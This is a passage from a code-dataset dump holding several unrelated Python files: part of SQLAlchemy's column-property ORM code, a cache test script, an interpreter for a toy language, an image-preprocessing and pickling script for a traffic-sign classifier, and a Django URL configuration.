*additional_columns, **kwargs\n ):\n super(ColumnProperty, self).__init__()\n columns = (column,) + additional_columns\n self._orig_columns = [\n coercions.expect(roles.LabeledColumnExprRole, c) for c in columns\n ]\n self.columns = [\n _orm_full_deannotate(\n coercions.expect(roles.LabeledColumnExprRole, c)\n )\n for c in columns\n ]\n self.parent = self.key = None\n self.group = kwargs.pop(\"group\", None)\n self.deferred = kwargs.pop(\"deferred\", False)\n self.raiseload = kwargs.pop(\"raiseload\", False)\n self.instrument = kwargs.pop(\"_instrument\", True)\n self.comparator_factory = kwargs.pop(\n \"comparator_factory\", self.__class__.Comparator\n )\n self.descriptor = kwargs.pop(\"descriptor\", None)\n self.active_history = kwargs.pop(\"active_history\", False)\n self.expire_on_flush = kwargs.pop(\"expire_on_flush\", True)\n\n if \"info\" in kwargs:\n self.info = kwargs.pop(\"info\")\n\n if \"doc\" in kwargs:\n self.doc = kwargs.pop(\"doc\")\n else:\n for col in reversed(self.columns):\n doc = getattr(col, \"doc\", None)\n if doc is not None:\n self.doc = doc\n break\n else:\n self.doc = None\n\n if kwargs:\n raise TypeError(\n \"%s received unexpected keyword argument(s): %s\"\n % (self.__class__.__name__, \", \".join(sorted(kwargs.keys())))\n )\n\n util.set_creation_order(self)\n\n self.strategy_key = (\n (\"deferred\", self.deferred),\n (\"instrument\", self.instrument),\n )\n if self.raiseload:\n self.strategy_key += ((\"raiseload\", True),)\n\n def declarative_scan(\n self, registry, cls, key, annotation, is_dataclass_field\n ):\n column = self.columns[0]\n if column.key is None:\n column.key = key\n if column.name is None:\n column.name = key\n\n @property\n def mapper_property_to_assign(self) -> Optional[\"MapperProperty[_T]\"]:\n return self\n\n @property\n def columns_to_assign(self) -> List[Column]:\n return [\n c\n for c in self.columns\n if isinstance(c, Column) and c.table is None\n ]\n\n def _memoized_attr__renders_in_subqueries(self):\n return (\"deferred\", True) not in self.strategy_key or (\n self not in self.parent._readonly_props\n )\n\n @util.preload_module(\"sqlalchemy.orm.state\", \"sqlalchemy.orm.strategies\")\n def 
_memoized_attr__deferred_column_loader(self):\n state = util.preloaded.orm_state\n strategies = util.preloaded.orm_strategies\n return state.InstanceState._instance_level_callable_processor(\n self.parent.class_manager,\n strategies.LoadDeferredColumns(self.key),\n self.key,\n )\n\n @util.preload_module(\"sqlalchemy.orm.state\", \"sqlalchemy.orm.strategies\")\n def _memoized_attr__raise_column_loader(self):\n state = util.preloaded.orm_state\n strategies = util.preloaded.orm_strategies\n return state.InstanceState._instance_level_callable_processor(\n self.parent.class_manager,\n strategies.LoadDeferredColumns(self.key, True),\n self.key,\n )\n\n def __clause_element__(self):\n \"\"\"Allow the ColumnProperty to work in expression before it is turned\n into an instrumented attribute.\n \"\"\"\n\n return self.expression\n\n @property\n def expression(self):\n \"\"\"Return the primary column or expression for this ColumnProperty.\n\n E.g.::\n\n\n class File(Base):\n # ...\n\n name = Column(String(64))\n extension = Column(String(8))\n filename = column_property(name + '.' + extension)\n path = column_property('C:/' + filename.expression)\n\n .. seealso::\n\n :ref:`mapper_column_property_sql_expressions_composed`\n\n \"\"\"\n return self.columns[0]\n\n def instrument_class(self, mapper):\n if not self.instrument:\n return\n\n attributes.register_descriptor(\n mapper.class_,\n self.key,\n comparator=self.comparator_factory(self, mapper),\n parententity=mapper,\n doc=self.doc,\n )\n\n def do_init(self):\n super().do_init()\n\n if len(self.columns) > 1 and set(self.parent.primary_key).issuperset(\n self.columns\n ):\n util.warn(\n (\n \"On mapper %s, primary key column '%s' is being combined \"\n \"with distinct primary key column '%s' in attribute '%s'. \"\n \"Use explicit properties to give each column its own \"\n \"mapped attribute name.\"\n )\n % (self.parent, self.columns[1], self.columns[0], self.key)\n )\n\n def copy(self):\n return ColumnProperty(\n deferred=self.deferred,\n group=self.group,\n active_history=self.active_history,\n *self.columns,\n )\n\n def _getcommitted(\n self, state, dict_, column, passive=attributes.PASSIVE_OFF\n ):\n return state.get_impl(self.key).get_committed_value(\n state, dict_, passive=passive\n )\n\n def merge(\n self,\n session,\n source_state,\n source_dict,\n dest_state,\n dest_dict,\n load,\n _recursive,\n _resolve_conflict_map,\n ):\n if not self.instrument:\n return\n elif self.key in source_dict:\n value = source_dict[self.key]\n\n if not load:\n dest_dict[self.key] = value\n else:\n impl = dest_state.get_impl(self.key)\n impl.set(dest_state, dest_dict, value, None)\n elif dest_state.has_identity and self.key not in dest_dict:\n dest_state._expire_attributes(\n dest_dict, [self.key], no_loader=True\n )\n\n class Comparator(util.MemoizedSlots, PropComparator[_PT]):\n \"\"\"Produce boolean, comparison, and other operators for\n :class:`.ColumnProperty` attributes.\n\n See the documentation for :class:`.PropComparator` for a brief\n overview.\n\n .. 
seealso::\n\n :class:`.PropComparator`\n\n :class:`.ColumnOperators`\n\n :ref:`types_operators`\n\n :attr:`.TypeEngine.comparator_factory`\n\n \"\"\"\n\n __slots__ = \"__clause_element__\", \"info\", \"expressions\"\n\n def _orm_annotate_column(self, column):\n \"\"\"annotate and possibly adapt a column to be returned\n as the mapped-attribute exposed version of the column.\n\n The column in this context needs to act as much like the\n column in an ORM mapped context as possible, so includes\n annotations to give hints to various ORM functions as to\n the source entity of this column. It also adapts it\n to the mapper's with_polymorphic selectable if one is\n present.\n\n \"\"\"\n\n pe = self._parententity\n annotations = {\n \"entity_namespace\": pe,\n \"parententity\": pe,\n \"parentmapper\": pe,\n \"proxy_key\": self.prop.key,\n }\n\n col = column\n\n # for a mapper with polymorphic_on and an adapter, return\n # the column against the polymorphic selectable.\n # see also orm.util._orm_downgrade_polymorphic_columns\n # for the reverse operation.\n if self._parentmapper._polymorphic_adapter:\n mapper_local_col = col\n col = self._parentmapper._polymorphic_adapter.traverse(col)\n\n # this is a clue to the ORM Query etc. that this column\n # was adapted to the mapper's polymorphic_adapter. the\n # ORM uses this hint to know which column its adapting.\n annotations[\"adapt_column\"] = mapper_local_col\n\n return col._annotate(annotations)._set_propagate_attrs(\n {\"compile_state_plugin\": \"orm\", \"plugin_subject\": pe}\n )\n\n def _memoized_method___clause_element__(self):\n if self.adapter:\n return self.adapter(self.prop.columns[0], self.prop.key)\n else:\n return self._orm_annotate_column(self.prop.columns[0])\n\n def _memoized_attr_info(self):\n \"\"\"The .info dictionary for this attribute.\"\"\"\n\n ce = self.__clause_element__()\n try:\n return ce.info\n except AttributeError:\n return self.prop.info\n\n def _memoized_attr_expressions(self):\n \"\"\"The full sequence of columns referenced by this\n attribute, adjusted for any aliasing in progress.\n\n .. versionadded:: 1.3.17\n\n \"\"\"\n if self.adapter:\n return [\n self.adapter(col, self.prop.key)\n for col in self.prop.columns\n ]\n else:\n return [\n self._orm_annotate_column(col) for col in self.prop.columns\n ]\n\n def _fallback_getattr(self, key):\n \"\"\"proxy attribute access down to the mapped column.\n\n this allows user-defined comparison methods to be accessed.\n \"\"\"\n return getattr(self.__clause_element__(), key)\n\n def operate(self, op, *other, **kwargs):\n return op(self.__clause_element__(), *other, **kwargs)\n\n def reverse_operate(self, op, other, **kwargs):\n col = self.__clause_element__()\n return op(col._bind_param(op, other), col, **kwargs)\n\n def __str__(self):\n if not self.parent or not self.key:\n return object.__repr__(self)\n return str(self.parent.class_.__name__) + \".\" + self.key\n\n\nclass MappedColumn(\n SQLCoreOperations[_T],\n _IntrospectsAnnotations,\n _MapsColumns[_T],\n):\n \"\"\"Maps a single :class:`_schema.Column` on a class.\n\n :class:`_orm.MappedColumn` is a specialization of the\n :class:`_orm.ColumnProperty` class and is oriented towards declarative\n configuration.\n\n To construct :class:`_orm.MappedColumn` objects, use the\n :func:`_orm.mapped_column` constructor function.\n\n .. 
versionadded:: 2.0\n\n\n \"\"\"\n\n __slots__ = (\n \"column\",\n \"_creation_order\",\n \"foreign_keys\",\n \"_has_nullable\",\n \"deferred\",\n )\n\n deferred: bool\n column: Column[_T]\n foreign_keys: Optional[Set[ForeignKey]]\n\n def __init__(self, *arg, **kw):\n self.deferred = kw.pop(\"deferred\", False)\n self.column = cast(\"Column[_T]\", Column(*arg, **kw))\n self.foreign_keys = self.column.foreign_keys\n self._has_nullable = \"nullable\" in kw\n util.set_creation_order(self)\n\n def _copy(self, **kw):\n new = self.__class__.__new__(self.__class__)\n new.column = self.column._copy(**kw)\n new.deferred = self.deferred\n new.foreign_keys = new.column.foreign_keys\n new._has_nullable = self._has_nullable\n util.set_creation_order(new)\n return new\n\n @property\n def mapper_property_to_assign(self) -> Optional[\"MapperProperty[_T]\"]:\n if self.deferred:\n return ColumnProperty(self.column, deferred=True)\n else:\n return None\n\n @property\n def columns_to_assign(self) -> List[Column]:\n return [self.column]\n\n def __clause_element__(self):\n return self.column\n\n def operate(self, op, *other, **kwargs):\n return op(self.__clause_element__(), *other, **kwargs)\n\n def reverse_operate(self, op, other, **kwargs):\n col = self.__clause_element__()\n return op(col._bind_param(op, other), col, **kwargs)\n\n def declarative_scan(\n self, registry, cls, key, annotation, is_dataclass_field\n ):\n column = self.column\n if column.key is None:\n column.key = key\n if column.name is None:\n column.name = key\n\n sqltype = column.type\n\n argument = _extract_mapped_subtype(\n annotation,\n cls,\n key,\n MappedColumn,\n sqltype._isnull and not self.column.foreign_keys,\n is_dataclass_field,\n )\n if argument is None:\n return\n\n self._init_column_for_annotation(cls, registry, argument)\n\n @util.preload_module(\"sqlalchemy.orm.decl_base\")\n def declarative_scan_for_composite(\n self, registry, cls, key, param_name, param_annotation\n ):\n decl_base = util.preloaded.orm_decl_base\n decl_base._undefer_column_name(param_name, self.column)\n self._init_column_for_annotation(cls, registry, param_annotation)\n\n def _init_column_for_annotation(self, cls, registry, argument):\n sqltype = self.column.type\n\n nullable = False\n\n if hasattr(argument, \"__origin__\"):\n nullable = NoneType in argument.__args__\n\n if not self._has_nullable:\n self.column.nullable = nullable\n\n if sqltype._isnull and not self.column.foreign_keys:\n sqltype = None\n our_type = de_optionalize_union_types(argument)\n\n if is_fwd_ref(our_type):\n our_type = de_stringify_annotation(cls, our_type)\n\n if registry.type_annotation_map:\n sqltype = registry.type_annotation_map.get(our_type)\n if sqltype is None:\n sqltype = sqltypes._type_map_get(our_type)\n\n if sqltype is None:\n raise sa_exc.ArgumentError(\n f\"Could not locate SQLAlchemy Core \"\n f\"type for Python type: {our_type}\"\n )\n self.column.type = sqltype\n","sub_path":"lib/sqlalchemy/orm/properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":16721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"412570714","text":"from cache import Cache\r\nimport random\r\n\r\nif __name__ == '__main__':\r\n\r\n # Test the cache\r\n Keys = [i for i in range(7)] # Entries\r\n sites = ['entry 1 ','entry 2 ','entry 3 ','entry 4 ' ]\r\n\r\n # Cache object using fucntion cache\r\n cache = Cache()\r\n\r\n print('_'*40)\r\n # Updating Cache with entries\r\n for i, key in enumerate(Keys):\r\n if key in 
cache:\r\n continue\r\n else:\r\n value = ''.join([random.choice(sites)])\r\n print('\\t', value)\r\n cache.update(key, value)\r\n\r\n print(\"{0}.Iteration, #{1} cached entries\" .format(i+1, cache.size()))\r\n\r\n # Cache List\r\n print('\\n\\n\\t', '*'*10, ' CACHE LIST ', '*'*10)\r\n for k, v in cache.view().items():\r\n print(\"{0} : {1}\".format(k, v))\r\n print('_' * 60)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"570482987","text":"from .interpreter import Interpreter\nfrom enum import Enum\nimport re\nimport copy\nclass Executer:\n\n class Statment:\n def __init__(self, code:int = -1, line: str = \"\"):\n self.code = code \n self.line = line\n def __str__(self):\n return \"code: \"+str(self.code)+\"\\tLine:\"+self.line\n\n class Variable:\n def __init__(self, name: str, value: str, vType: str):\n self.name = name\n self.type = vType\n self.setValue(value)\n \n def __str__(self):\n return self.name + \",\"+ str(self.value)+\",\"+self.type\n \n def setValue(self, val:str):\n if(self.type == \"CHAR\"):\n if(len(val) == 3 or len(val)==0):\n self.value = val.replace('\\'','')\n else:\n raise\n elif(self.type == \"FLOAT\"):\n self.value = float(val)\n elif(self.type == \"INT\"):\n self.value = int(val)\n elif(self.type == \"BOOL\"):\n self.value = val\n # print(val)\n # if(val == 'TRUE' or val == 'FALSE'):\n # self.value = True if val == \"TRUE\" else False\n # elif(val == True or val == False):\n # self.value = val\n # else:\n # raise Exception('Error setting', val)\n else:\n self.value = val\n def getValue(self):\n return self.value\n \n def getName(self):\n return self.name\n\n class Code(Enum):\n ERROR = -1\n INIT_STATEMENT = 0\n COMMENT_STATEMENT = 1\n START_STATEMENT = 2\n STOP_STATEMENT = 3\n OUTPUT_STATEMENT = 4\n ASSIGNMENT_STATEMENT = 5\n IF_STATEMENT = 6\n WHILE_STATEMENT = 7\n INPUT_STATEMENT = 8\n ELSE_STATEMENT = 9\n \n\n def __init__(self):\n self.interpreter = Interpreter()\n self.parsed = []\n self.memory = {}\n self.lines = []\n self.inputs = []\n self.programStarted: bool = False\n self.programStopped: bool = True\n \n def setInputs(self, inputs):\n self.inputs = inputs\n\n def setMemory(self, memory):\n self.memory = memory\n \n def displayLines(self):\n for index,val in enumerate(self.lines):\n print(index, val)\n\n def displayParsed(self):\n for i,stmt in enumerate(self.parsed):\n print('PARSED:',i,stmt)\n \n def displayMemory(self):\n for attr, value in self.memory.items():\n print(attr, ':', value)\n\n def setLines(self,strLines):\n self.lines = [ line for line in strLines if self.getCode(line) != self.Code.COMMENT_STATEMENT]\n for index,line in enumerate(self.lines):\n stmt = self.Statment(self.getCode(line), line)\n if(stmt.code == self.Code.START_STATEMENT):\n self.programStarted = True\n elif(stmt.code == self.Code.INIT_STATEMENT and self.programStarted):\n raise Exception('Variable Declaration done after Start')\n elif(stmt.code == self.Code.ERROR):\n raise Exception('Error on Line',index, line)\n self.parsed.append(stmt)\n if(not self.programStarted):\n raise Exception('No START statement')\n if(self.parsed[-1].code != self.Code.STOP_STATEMENT):\n raise Exception('Program does not end with an STOP statement')\n \n\n def setParsed(self, parsed):\n self.parsed = parsed\n\n def processParsed(self):\n index = 0\n while(index < len(self.parsed)):\n stmt = self.parsed[index]\n if(stmt.code == 
self.Code.START_STATEMENT):\n pairStopIndex = self.findPairStop(index+1)\n statements = self.parsed[index+1:pairStopIndex]\n del self.parsed[index:pairStopIndex+1]\n executer = Executer()\n executer.setParsed(statements)\n self.parsed.insert(index,executer)\n index = index + 1\n \n def findPairStop(self, index):\n numStack = 1\n pairStopIndex = -1\n for idx, stmt in enumerate(self.parsed[index:]):\n if(stmt.code == self.Code.START_STATEMENT):\n numStack = numStack + 1\n elif (stmt.code == self.Code.STOP_STATEMENT):\n numStack = numStack - 1\n if(numStack == 0):\n pairStopIndex = idx\n break\n if(pairStopIndex == -1):\n raise Exception('Un paired START on line', index)\n return index + pairStopIndex\n\n def executeProgram(self):\n self.processParsed()\n index = 0\n strLines = []\n while index < len(self.parsed):\n stmt = self.parsed[index]\n addToIndex, strNewLines = self.executeStatement(stmt, index)\n index = index + addToIndex\n strLines = strLines + strNewLines\n index = index + 1\n return strLines\n \n def executeStatement(self, stmt, currentIndex):\n index = 0\n strLines = []\n if(isinstance(stmt, Executer)):\n stmt.setInputs(self.inputs)\n stmt.setMemory(self.memory)\n strLines = stmt.executeProgram() + strLines\n else:\n if(stmt.code == self.Code.INIT_STATEMENT):\n self.execute_INIT_STATEMENT(stmt.line)\n elif(stmt.code == self.Code.START_STATEMENT):\n self.execute_START_STATEMENT()\n elif(stmt.code == self.Code.STOP_STATEMENT):\n self.execute_STOP_STATEMENT()\n elif(stmt.code == self.Code.ASSIGNMENT_STATEMENT):\n self.execute_ASSIGNMENT_STATEMENT(stmt.line)\n elif(stmt.code == self.Code.OUTPUT_STATEMENT):\n strLines = strLines + self.execute_OUTPUT_STATEMENT(stmt.line)\n elif(stmt.code == self.Code.IF_STATEMENT):\n addToIndex = 0\n hasElse = False\n if(currentIndex+2 < len(self.parsed)):\n hasElse = self.parsed[currentIndex+2].code == self.Code.ELSE_STATEMENT\n # print(\"has Else\",hasElse, currentIndex+2)\n # for i, val in enumerate(self.parsed):\n # print('IF',i, val)\n result = self.execute_IF_STATEMENT(stmt.line)\n if(result):\n if(hasElse):\n del self.parsed[currentIndex+3] # Executer\n del self.parsed[currentIndex+2] # Else STATEMENT\n else:\n addToIndex = 1\n \n index = index + addToIndex\n \n elif(stmt.code == self.Code.ELSE_STATEMENT):\n pass\n elif(stmt.code == self.Code.INPUT_STATEMENT):\n self.execute_INPUT_STATEMENT(stmt.line)\n elif(stmt.code == self.Code.WHILE_STATEMENT):\n addToIndex, strNewLines = self.execute_WHILE_STATEMENT(stmt.line, currentIndex)\n index = index + addToIndex\n strLines = strLines + strNewLines\n return index, strLines\n\n def execute_INIT_STATEMENT(self, strLine):\n terms = self.removeGarbageFromArray(re.split(\"(VAR)|(AS)|(INT)|(CHAR)|(BOOL)|(FLOAT)|(,)\", strLine))\n # print(terms)\n # Get Type\n varType = terms[-1]\n # Get Initializations\n for term in terms:\n term = term.strip()\n defaultValue = self.getDefaultValueOfType(varType)\n if(self.interpreter.isKeyWord(term)):\n continue\n elif(self.interpreter.isValidIdentifier(term)):\n self.addVariable(term, defaultValue, varType)\n elif(self.interpreter.isValidAssignmentStatement(term)):\n newTerm = self.removeGarbageFromArray(term.split('='))\n self.addVariable(newTerm[0],defaultValue,varType)\n self.execute_ASSIGNMENT_STATEMENT(term)\n \n def execute_IF_STATEMENT(self, strLine):\n terms = self.removeGarbageFromArray(re.split('(IF)',strLine))\n return self.solveBooleanEquation(terms[1])\n\n def execute_WHILE_STATEMENT(self, strLine, index):\n terms = 
self.removeGarbageFromArray(re.split('(WHILE)',strLine))\n        strLines = []\n        while(self.solveBooleanEquation(terms[1])):\n            stmt = copy.deepcopy(self.parsed[index+1])\n            newIndex, strNewLines = self.executeStatement(stmt, index + 1)\n            strLines = strLines + strNewLines\n        return 1 , strLines\n    \n    def solveBooleanEquation(self, equation):\n        \n        isBooleanEquation = self.interpreter.isValidBooleanOperation(equation)\n        eqTerms = re.split('(\\()|(\\))|(\\=\\=)|(\\<\\=)|(\\>\\=)|(\\&\\&)|(\\|\\|)|(\\<)|(\\>)',equation)\n        eqTerms = self.removeGarbageFromArray(eqTerms)\n        nodeList = []\n        for term in eqTerms:\n            if(not self.interpreter.isBooleanOperator(term) and self.interpreter.isValidArithmeticOperation(term)):\n                term = str(self.solveArithmeticEquation(term))\n            temp = Interpreter.Node(term)\n            nodeList.append(temp)\n        # print('Nodelist:',nodeList)\n\n        print(nodeList)\n        node = self.nodeCreate(nodeList, [\"==\",\"<=\",\">=\",\"<\",\">\",\"&&\",\"||\"])\n        return self.evaluateNode(node)\n    \n    def solveArithmeticEquation(self, equation):\n        eqTerms = re.split(' |(\\+)|(\\/)|(\\-)|(\\*)|(\\%)|(\\()|(\\))',equation)\n        eqTerms = self.removeGarbageFromArray(eqTerms)\n        nodeList = []\n        for term in eqTerms:\n            temp = Interpreter.Node(term)\n            nodeList.append(temp)\n        node = self.nodeCreate(nodeList)\n        return self.evaluateNode(node)\n\n    def execute_START_STATEMENT(self):\n        self.programStarted = True\n        self.programStopped = False\n\n    def execute_INPUT_STATEMENT(self,strLine):\n        terms = self.removeGarbageFromArray(re.split('(INPUT:)|,',strLine))\n        terms = terms[1:]\n        for term in terms:\n            try:\n                if len(self.inputs) == 0:\n                    raise\n                data = self.inputs.pop(0)\n                print('Setting '+term+\" with \"+data)\n                self.setVariable(term, data)\n            except:\n                print(self.inputs)\n                raise Exception('Input:'+term+\" caused error.\")\n\n    def execute_STOP_STATEMENT(self):\n        self.programStarted = False\n        self.programStopped = True\n\n    def execute_ASSIGNMENT_STATEMENT(self, strLine):\n        terms = self.removeGarbageFromArray(re.split(' |(\\=\\=)|(\\=)', strLine))\n        equation = \"\"\n        indexOfEQ = 0\n        for i, e in reversed(list(enumerate(terms))):\n            if e == \"=\":\n                break\n            equation = e + equation\n            indexOfEQ = i\n        del terms[indexOfEQ:]\n        val = None\n        if(self.interpreter.isValidArithmeticOperation(equation)):\n            val = self.solveArithmeticEquation(equation)\n        if(self.interpreter.isValidBooleanOperation(equation)):\n            print('Solving boolean equation',equation)\n            val = self.solveBooleanEquation(equation)\n        # val = self.solveBooleanEquation(equation) if isBooleanEquation else \n        # val = self.evaluateNode(node)\n        variables = [x for x in terms if x != '=']\n        for variable in variables:\n            self.setVariable(variable, val)\n\n    def evaluateNode(self, node):\n        return self.postOrder(node, True)\n    \n    def postOrder(self, node, evaluationMode = False):\n        if node is None:\n            return None\n        elif node.left is None and node.right is None:\n            # print('Node Value:',node.value)\n            if self.interpreter.isValidNumericConstant(node.value):\n                return float(node.value) if \".\" in node.value else int(node.value)\n            elif self.interpreter.isValidBooleanConstant(node.value) or node.value == 'True' or node.value == 'False':\n                if evaluationMode:\n                    # compare both spellings explicitly; a bare or 'True' is always truthy\n                    return True if node.value == \"TRUE\" or node.value == 'True' else False\n                elif(node.value == 'True' or node.value == 'False'):\n                    return True if node.value == 'True' else False\n            elif self.interpreter.isValidIdentifier(node.value):\n                return self.getVariableData(node.value)\n            else:\n                return node.value\n        else:\n            left = self.postOrder(node.left)\n            right = 
self.postOrder(node.right)\n operation = node.value\n result = 0\n if(isinstance(left, bool)):\n left = 'TRUE' if left == True else left\n left = 'FALSE' if left == False else left\n if(isinstance(right,bool)):\n right = 'TRUE' if right == True else right\n right = 'FALSE' if right == False else right\n # print(\"Left:\", left, \"Right:\", right, \"Operation\", operation)\n if operation == \"*\":\n result = float(left) * float(right)\n elif operation == \"/\":\n result = float(left) / float(right)\n elif operation == \"%\":\n result = float(left) % float(right)\n elif operation == \"+\":\n result = float(left) + float(right)\n elif operation == \"-\":\n result = float(left) - float(right)\n #boolean operations\n elif operation == \"==\":\n result = left == right\n elif operation == \"<=\":\n result = left <= right\n elif operation == \">=\":\n result = left >= right\n elif operation == \"<\":\n result = left < right\n elif operation == \">\":\n result = left > right\n elif operation == \"&&\":\n result = left and right\n elif operation == \"||\":\n result = left or right\n else:\n result = None\n if(isinstance(result, bool)):\n result = 'TRUE' if result == True else result\n result = 'FALSE' if result == False else result\n return result\n\n def execute_OUTPUT_STATEMENT(self, strLine):\n terms = self.removeGarbageFromArray(re.split('OUTPUT:|&',strLine))\n outputStr = \"\"\n outputLines = []\n for term in terms:\n if(self.interpreter.isValidIdentifier(term)):\n data = self.getVariableData(term)\n if data is int or data is float:\n outputStr+= repr(data)\n else:\n outputStr+= str(data)\n elif(self.interpreter.isNewLine(term)):\n outputLines.append(outputStr)\n outputStr = \"\"\n elif(self.interpreter.isValidStringConstant(term)):\n term = term.replace('\"','')\n outputStr+= term\n else:\n raise Exception('Unknown term'+str(term))\n outputLines.append(outputStr)\n return outputLines\n\n def removeGarbageFromArray(str, terms, strip = True):\n terms = [x for x in terms if x is not None]\n terms = [x for x in terms if x is not ' ']\n terms = [x for x in terms if x is not '']\n if(strip):\n terms = [x.strip() for x in terms]\n return terms\n\n def getDefaultValueOfType(self, varType: str):\n switch = {\n \"INT\": 0,\n \"BOOL\": False,\n \"CHAR\": '',\n \"FLOAT\": 0.0\n }\n return switch.get(varType, None)\n \n def addVariable(self, name: str, initVal: str, varType: str):\n self.memory[name] = self.Variable(name,initVal,varType)\n\n def setVariable(self, name:str, newVal: str):\n if(name in self.memory):\n self.memory[name].setValue(newVal)\n else:\n print(name,\"caused an exception\")\n raise\n \n def getVariableData(self, name:str):\n variable = None\n try:\n variable = self.memory[name].getValue()\n except:\n raise Exception('Cant Find:['+name+']\\nMemory:')\n return variable\n\n def getCode(self, strLine):\n if(self.interpreter.isValidCommentStatement(strLine)):\n return self.Code.COMMENT_STATEMENT\n if(self.interpreter.isValidInitializationStatement(strLine)):\n return self.Code.INIT_STATEMENT\n if(self.interpreter.isValidStartStatement(strLine)):\n return self.Code.START_STATEMENT\n if(self.interpreter.isValidStopStatement(strLine)):\n return self.Code.STOP_STATEMENT\n if(self.interpreter.isValidOutputStatement(strLine)):\n return self.Code.OUTPUT_STATEMENT\n if(self.interpreter.isValidAssignmentStatement(strLine)):\n return self.Code.ASSIGNMENT_STATEMENT\n if(self.interpreter.isValidIFstatement(strLine)):\n return self.Code.IF_STATEMENT\n if(self.interpreter.isELSE(strLine)):\n return 
self.Code.ELSE_STATEMENT\n if(self.interpreter.isValidWhileStatement(strLine)):\n return self.Code.WHILE_STATEMENT\n if(self.interpreter.inValidINPUTStatement(strLine)):\n return self.Code.INPUT_STATEMENT\n return self.Code.ERROR\n \n def findPair(self,nodeList: [], index):\n stack = []\n retIndex = index\n for node in nodeList:\n if(node.value == '('):\n stack.append(node.value)\n elif(node.value == ')'):\n stack.pop()\n if len(stack) == 0:\n break\n retIndex = retIndex + 1\n return retIndex\n\n def nodeCreate(self,nodeList:[], operationSequence = [['*','/','%'],['+','-']]):\n index = 0\n # print(\"Node List Start:\", nodeList)\n while index < len(nodeList):\n if (nodeList[index].value == '('):\n pairIndex= self.findPair(nodeList[index:],index)\n removedList = nodeList[index:pairIndex+1]\n del removedList[0]\n del removedList[-1]\n node = self.nodeCreate(removedList, operationSequence)\n del nodeList[index:pairIndex+1]\n node.value = str(self.postOrder(node))\n node.left = node.right = None\n nodeList.insert(index,node)\n index = index + 1\n if(len(nodeList) > 0):\n for operation in operationSequence:\n index = 0\n while index < len(nodeList):\n if(nodeList[index].value in operation):\n if(index+1 < len(nodeList)):\n nodeList[index].right = nodeList[index+1]\n del nodeList[index+1]\n if(index-1 >= 0):\n nodeList[index].left = nodeList[index-1]\n del nodeList[index-1]\n index = index + 1\n return nodeList[0]","sub_path":"old/executer.py","file_name":"executer.py","file_ext":"py","file_size_in_byte":19036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"48208743","text":"import os\r\nimport cv2\r\n#import pandas as pd\r\nimport pickle\r\nimport random\r\nimport numpy as np\r\n#import matplotlib.pyplot as plt\r\nimport gc\r\n\r\nPATH2= \"C:\\\\Users\\Aditya\\\\Desktop\\\\TEMProject\\\\Validation Set\"\r\nPATH = \"C:\\\\Users\\Aditya\\\\Desktop\\\\TEMProject\\\\Dataset\"\r\ntraining_data=[]\r\nIMG_SIZE =32\r\n#f = np.memmap('memmapped.dat', dtype=np.float64,mode='w+',shape=(10**2,81,81))\r\nX_train=[]\r\ny_train=[]\r\nX_test=[]\r\ny_test=[]\r\n\r\n\r\n\r\ndef create_training():\r\n\r\n for i in range(43):\r\n j=0\r\n\r\n str = PATH + \"{}{}\".format(\"\\\\\", i)\r\n if not os.path.exists(str):\r\n print(\"Skipped\",i)\r\n continue\r\n\r\n else:\r\n print(i)\r\n for file in os.listdir(str):\r\n #if(j>300):\r\n #break\r\n\r\n\r\n #img_array = cv2.imread(os.path.join(str, file), cv2.IMREAD_GRAYSCALE)\r\n new_array = cv2.resize( cv2.imread(os.path.join(str, file), cv2.IMREAD_GRAYSCALE), (IMG_SIZE, IMG_SIZE)) / 255.0\r\n #new_array=new_array/255\r\n #plt.imshow(new_array,cmap='gray')\r\n training_data.append([new_array, i])\r\n j+=1\r\n\r\n\r\n\r\ncreate_training()\r\n\r\nrandom.shuffle(training_data)\r\n\r\n\r\nfor features, label in training_data:\r\n X_train.append(features)\r\n y_train.append(label)\r\nX_train=np.array(X_train).reshape(-1,IMG_SIZE,IMG_SIZE,1)\r\npickle_out = open(\"X_train.pickle\", \"wb\")\r\npickle.dump(X_train, pickle_out)\r\npickle_out.close()\r\npickle_out = open(\"y_train.pickle\", \"wb\")\r\npickle.dump(y_train, pickle_out)\r\npickle_out.close()\r\nprint(\"Done w training \")\r\nprint(y_train[:10])\r\ngc.collect()\r\n\r\n\r\ndef create_validation() :\r\n\r\n for i in range(43):\r\n j=0\r\n str = PATH2 + \"{}{}\".format(\"\\\\\", i)\r\n if not os.path.exists(str):\r\n print(\"Skipped\",i)\r\n continue\r\n\r\n else:\r\n print(i)\r\n for file in os.listdir(str):\r\n if file == '{}.jpg'.format(i):\r\n 
print(\"SKIPPED\",file)\r\n pass\r\n #if(j>90):\r\n #break\r\n\r\n\r\n\r\n img_array = cv2.imread(os.path.join(str, file), cv2.IMREAD_GRAYSCALE)\r\n new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\r\n new_array=new_array/255\r\n #plt.imshow(new_array,cmap='gray')\r\n training_data.append([new_array, i])\r\n j+=1\r\n\r\n\r\n\r\n\r\n\r\ntraining_data=[]\r\ncreate_validation()\r\nrandom.shuffle(training_data)\r\nfor features, label in training_data:\r\n X_test.append(features)\r\n y_test.append(label)\r\nX_test=np.array(X_test).reshape(-1,IMG_SIZE,IMG_SIZE,1)\r\nprint(y_test[:10])\r\npickle_out = open(\"X_test.pickle\", \"wb\")\r\npickle.dump(X_test, pickle_out)\r\npickle_out.close()\r\npickle_out = open(\"y_test.pickle\", \"wb\")\r\npickle.dump(y_test, pickle_out)\r\npickle_out.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"2traincopy.py","file_name":"2traincopy.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"52887581","text":"from django.conf.urls import url\n\nfrom .api import (\n CreateUser, LoginUser, CurrentUser,\n SignupAnonymousUser)\n\n\nurlpatterns = [\n url(r'^signup/$',\n CreateUser.as_view(),\n name='create-user'),\n url(r'^login/$', \n LoginUser.as_view(), \n name='login-user'),\n url(r'^$',\n CurrentUser.as_view(),\n name='current-user'),\n url(r'^anonymous/$',\n SignupAnonymousUser.as_view(),\n 